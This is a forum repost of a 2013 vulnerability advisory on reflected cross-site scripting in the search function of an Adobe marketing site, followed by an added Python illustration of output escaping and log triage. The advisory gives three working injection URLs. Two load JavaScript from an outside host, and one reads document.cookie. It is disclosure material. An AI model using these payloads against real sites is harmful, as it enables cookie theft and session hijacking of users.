Praetorian503 Posted January 21, 2013

Adobe Experience suffers from a reflected cross site scripting vulnerability. The author contacted Adobe back in August but the issue is still not resolved, so they are releasing details in hopes that Adobe will address the issue. Note that this finding houses site-specific data.

----------------------------------------------------------------------------------------------------
Title       : Adobe Experience Delivers reflected Cross-site Scripting (XSS) vulnerability
Vendor      : Adobe Systems Incorporated (http://www.adobe.com)
Description : experiencedelivers.adobe.com is vulnerable to reflected Cross-site Scripting attacks

Advisory time-line:
----------------------------------------------------------------------------------------------------
- Vendor PSIRT notified : 05-Aug-2012
- Vendor response       : 05-Aug-2012. Ticket created. "Looking into it now".
- Status requests       : 09-Sep-2012, 01-Nov-2012, 08-Nov-2012, 13-Nov-2012, 31-Dec-2012
  Adobe PSIRT has not responded to any requests after 09-Nov-2012
- Packet Storm advisory : 19-Jan-2013

Test environment
----------------------------------------------------------------------------------------------------
- Latest Firefox browser

Details
----------------------------------------------------------------------------------------------------
Affected functionality: search function

Test #1: Remote Javascript execution: display browser cookie
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&blog=search&_charset_=UTF-8

Test #2: Remote Javascript execution: overwrite HTML content - PoC
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fae00.js%3E%3C%2Fscript%3E&blog=search&_charset_=UTF-8

Test #3: Alert test with image-tag
http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&blog=search&_charset_=UTF-8

Note: the Javascript test cases are not malicious.

Researcher
----------------------------------------------------------------------------------------------------
Janne Ahlberg
Twitter: https://twitter.com/JanneFI
Blog: http://janne.is
Project site: http://idash.net
----------------------------------------------------------------------------------------------------
Source: PacketStorm
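Every test URL in the advisory starts its `query` value with an encoded `">`, which only breaks out if the search term is echoed raw into a double-quoted attribute. The Python below is an added illustration, not code from the advisory, the forum post or Adobe: it decodes the advisory's third test URL, renders it through a hypothetical vulnerable template and through the same template with attribute encoding, and adds a coarse log-triage check for search requests carrying markup characters.

```python
import html
from urllib.parse import parse_qs, urlparse

# Third test URL quoted in the advisory (the alert-in-image-tag case).
ADVISORY_TEST3 = (
    "http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html"
    "?query=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E"
    "&blog=search&_charset_=UTF-8"
)


def search_term(url: str) -> str:
    """Return the decoded 'query' parameter as the server-side code would see it."""
    return parse_qs(urlparse(url).query).get("query", [""])[0]


def render_unsafe(term: str) -> str:
    """Hypothetical vulnerable template: the term is dropped raw into a quoted attribute."""
    return f'<input type="text" name="query" value="{term}">'


def render_safe(term: str) -> str:
    """Hardened template: HTML attribute encoding neutralises the '">' break-out."""
    return f'<input type="text" name="query" value="{html.escape(term, quote=True)}">'


def injection_into_attribute(rendered: str) -> bool:
    """True when the rendered markup contains more than the single <input> tag emitted."""
    return rendered.count("<") != 1 or rendered.count(">") != 1


# Coarse triage heuristic for access logs: flag search requests whose decoded
# term carries markup or quote characters. Tune to your own traffic (assumption:
# legitimate search terms on this form do not contain these characters).
SUSPECT_CHARS = set('<>"\'')


def suspicious_search_request(url: str) -> bool:
    return any(c in SUSPECT_CHARS for c in search_term(url))


if __name__ == "__main__":
    term = search_term(ADVISORY_TEST3)
    print("decoded term :", term)
    print("unsafe render:", render_unsafe(term))
    print("safe render  :", render_safe(term))
```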